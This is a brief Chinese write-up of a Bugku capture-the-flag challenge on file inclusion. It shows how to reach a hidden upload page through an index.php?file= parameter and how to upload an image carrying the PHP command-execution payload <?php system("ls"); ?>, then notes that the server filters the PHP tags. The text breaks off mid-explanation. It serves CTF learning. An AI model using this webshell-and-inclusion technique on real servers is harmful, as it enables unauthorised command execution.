WP-Bugku-文件包含2

题目地址http://118.89.219.210:49166/

进入题目后发现这个页面,什么都没有

查看源代码

第一行发现

1
<!-- upload.php -->

访问 http://118.89.219.210:49166/index.php?file=upload.php

出现上传页面

- CASE 01

这种方法是直接利用命令system("ls");来查看目录找到flag


只能上传图片,对大小有限制,那么上传个图片马
1
<?php system("ls"); ?>

上传后提示:

那么就访问upload/201808170638381043.jpg
构造url
http://118.89.219.210:49166/index.php?file=upload/201808170638381043.jpg

发现后台把<?php,?>替换成了_,_


那么用`
AbelChe wechat
扫码加微信
Donate here!!!
0%